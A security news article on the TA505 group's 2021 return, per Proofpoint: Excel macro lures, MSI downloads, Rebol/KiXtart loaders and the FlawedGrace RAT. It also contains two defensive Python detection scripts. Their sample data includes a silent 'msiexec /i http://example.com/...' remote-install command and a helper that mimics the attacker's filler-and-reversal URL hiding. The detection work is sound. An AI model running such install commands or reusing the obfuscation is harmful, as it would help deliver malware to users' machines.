TA505 Gang is Back in the Wild


According to enterprise security vendor Proofpoint, TA505, a prominent email-borne threat actor, is back. The group, which had been largely quiet since 2020, resumed mass malicious-email campaigns in September 2021, equipped with new malware loaders and an updated RAT.

The financially motivated TA505 crew has restarted its malware-distribution operation, hitting a variety of sectors with email waves that started at low volume and, as researchers observed, spiked late in the month.

The group, which aggressively targets a range of industries including finance, retail and hospitality, has been active since at least 2014. It is known for rapidly changing its malware and for setting trends in criminal malware distribution worldwide.

It is behind some of the largest spam campaigns Proofpoint has observed, including those that spread the Dridex banking trojan. Proofpoint has also seen the group deliver Locky and Jaff ransomware, The Trick banking trojan, and other malware "in very high volumes," according to the company.

True to form, the gang's latest campaigns span a wide spectrum of sectors. They also bring new tooling: an updated KiXtart loader, the MirrorBlast loader, which fetches Rebol script stagers, a retooled FlawedGrace RAT, and improved malicious Excel attachments.

Proofpoint researchers tracked renewed TA505 campaigns that began slowly at the start of September, with only a few thousand emails per wave carrying malicious Excel attachments, and then ramped up later in the month to tens and then hundreds of thousands of emails per wave by the end of September, according to the company's published analysis.

As per the report, several of the campaigns, especially the larger ones, "strongly resemble" the group's 2019 and 2020 activity, with the same domain naming patterns, email lures, Excel file lures, and delivery of the FlawedGrace RAT. The early September waves used more targeted lures and hit fewer sectors than the broader October 2021 campaigns, according to Proofpoint researchers.

Notable changes include an updated FlawedGrace RAT and retooled intermediate loader stages written in Rebol and KiXtart. The group has also swapped out its long-used Get2 downloader for new downloaders.

“The new downloaders perform similar functionality of reconnaissance and pulling in the next stages,” Proofpoint researchers noted. 

“The emails contained an Excel attachment that, when opened and macros enabled, would lead to the download and running of an MSI file,” Proofpoint said. MSI files are Windows Installer packages, normally used to install software on a Windows system. “The MSI file, in turn, would execute an embedded Rebol loader, dubbed by Proofpoint as MirrorBlast.”
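The chain described above (Excel with macros enabled, which then downloads and launches an MSI) leaves a recognisable process-creation trail on the endpoint. The following is an added detection example, not Proofpoint's code or anything from the campaign itself: it walks Sysmon-style process-creation records and flags msiexec.exe launched with an Office application somewhere in its parent chain. The event records, process IDs, paths and the URL are constructed for the example; the `max_depth` walk is there so that an intermediate cmd.exe or script host between Excel and msiexec does not hide the Office origin.

```python
import re

# Office applications that should never normally spawn an installer.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Constructed sample records in the shape of Sysmon Event ID 1 (process creation).
# PIDs, paths and the URL are invented for this example.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsm'},
    # direct child: Excel macro hands a URL straight to the Windows Installer
    {"pid": 5202, "ppid": 4120,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://example.com/update.msi /qn"},
    # indirect child: Excel -> cmd.exe -> msiexec.exe with a dropped local package
    {"pid": 4300, "ppid": 4120,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c msiexec.exe /i %TEMP%\pkg.msi /quiet"},
    {"pid": 4400, "ppid": 4300,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\pkg.msi /quiet"},
    # benign: software deployment agent (pid 1200, not in the sample) installing a package
    {"pid": 6001, "ppid": 1200,
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Windows\Temp\vendor.msi /qn"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
QUIET_RE = re.compile(r"/q(uiet|n|b)?\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_office_msi_chains(events, max_depth=3):
    """Return one hit per msiexec.exe process whose ancestry, up to max_depth
    levels, contains an Office application."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe":
            continue
        parent, depth = by_pid.get(e["ppid"]), 0
        while parent is not None and depth < max_depth:
            if basename(parent["image"]) in OFFICE_IMAGES:
                url = URL_RE.search(e["cmdline"])
                hits.append({
                    "pid": e["pid"],
                    "office_parent": basename(parent["image"]),
                    "depth": depth + 1,                       # 1 = direct child
                    "remote_source": url.group(0) if url else None,
                    "quiet": bool(QUIET_RE.search(e["cmdline"])),
                })
                break
            parent, depth = by_pid.get(parent["ppid"]), depth + 1
    return hits


if __name__ == "__main__":
    for hit in find_office_msi_chains(SAMPLE_EVENTS):
        print(hit)
```

The same rule expressed against real telemetry would key on `ParentImage`/`Image` from Sysmon or `ParentProcessName`/`NewProcessName` from Windows Security event 4688; the point of walking more than one level is that a macro frequently shells out through cmd.exe, wscript.exe or PowerShell before the installer runs.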

Researchers also found that TA505 now chains several intermediate loaders before delivering the FlawedGrace RAT, and that these are written in the uncommon scripting languages Rebol and KiXtart.

The intermediate loaders appear to serve the same purpose as Get2, the downloader TA505 has used since 2019 to deliver a range of secondary payloads, according to researchers.

“The loaders perform minimal reconnaissance of an infected machine, such as collecting user domain and username information and downloading further payloads,” according to the research. 

“The code responsible for downloading the next stage MSI file was typically lightly obfuscated with filler characters, string reversing or similar simple functions and hidden in the document Comments, Title, in a Cell or other locations,” the researchers noted. 
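Because the downloader stub lives in document metadata rather than only in the macro body, a static triage script can pull the OOXML `docProps/core.xml` part and try simple reversals of the obfuscations Proofpoint describes (filler characters and string reversal). The following is an added example of such a scanner, not Proofpoint's code and not a reproduction of TA505's actual encoding: the workbook is built in memory for the test, the filler-plus-reverse scheme in `obfuscate()` merely mimics the description in the report, the URL is a placeholder, and only the Title and Comments (`dc:description`) fields are checked; cell contents, which the report also mentions, would need a separate pass over `xl/sharedStrings.xml` and the sheet parts.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML part that holds the Title and Comments fields shown in Excel's file properties.
CORE_PART = "docProps/core.xml"
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
# What a decoded stager typically needs to contain to fetch or launch an MSI.
INDICATOR = re.compile(r"(https?://\S+|\.msi\b|msiexec)", re.IGNORECASE)
# Characters legitimately found in a URL; anything else repeated is a filler candidate.
URL_CHARS = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "0123456789:/.-_?=&%")


def obfuscate(url, filler="#"):
    """Constructed encoding for the example: reverse the string and interleave a filler.
    It mimics the 'filler characters, string reversing' description, nothing more."""
    return filler.join(url[::-1])


def build_sample_workbook(description, title="Invoice"):
    """Minimal in-memory .xlsx-like zip whose core properties carry the given text."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:title>%s</dc:title><dc:description>%s</dc:description>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"], title, description)
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr(CORE_PART, core)
    return buf.getvalue()


def candidate_decodings(s):
    """Plausible light deobfuscations of a metadata string, labelled by method."""
    variants = [("as-is", s)]
    # Any non-URL character occurring three or more times is tried as a filler.
    for ch in sorted({c for c in s if c not in URL_CHARS and s.count(c) >= 3}):
        variants.append(("strip %r" % ch, s.replace(ch, "")))
    # Try every variant reversed as well, since reversal is cheap to undo.
    variants += [(how + " + reverse", v[::-1]) for how, v in variants]
    return variants


def scan_workbook(data):
    """Return (field, decoding, indicator) for metadata fields that decode to a
    download or installer indicator."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        if CORE_PART not in z.namelist():
            return findings
        root = ET.fromstring(z.read(CORE_PART))
    for field in ("dc:title", "dc:description"):
        node = root.find(field, NS)
        if node is None or not node.text:
            continue
        for how, decoded in candidate_decodings(node.text):
            m = INDICATOR.search(decoded)
            if m:
                findings.append((field, how, m.group(0)))
                break
    return findings


if __name__ == "__main__":
    # Placeholder URL on a reserved example domain; constructed for the demonstration.
    sample = build_sample_workbook(obfuscate("http://example.com/update.msi"))
    print(scan_workbook(sample))
    print(scan_workbook(build_sample_workbook("Quarterly figures attached")))
```

The decoding list is deliberately small. The report describes the obfuscation as light, so brute-forcing two cheap transforms is enough to surface the indicator for triage, and the field name in the finding tells an analyst exactly where in the document to look.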

Given that TA505 regularly changes its TTPs and is "considered a trendsetter in the world of cybercrime," Proofpoint does not expect the group to go away any time soon. The actor does not restrict its target set; it is an equal-opportunity attacker with respect to the regions and sectors it chooses, researchers said. That, together with TA505's adaptability, its focus on whatever is most profitable and its readiness to change TTPs as needed, makes it a persistent threat.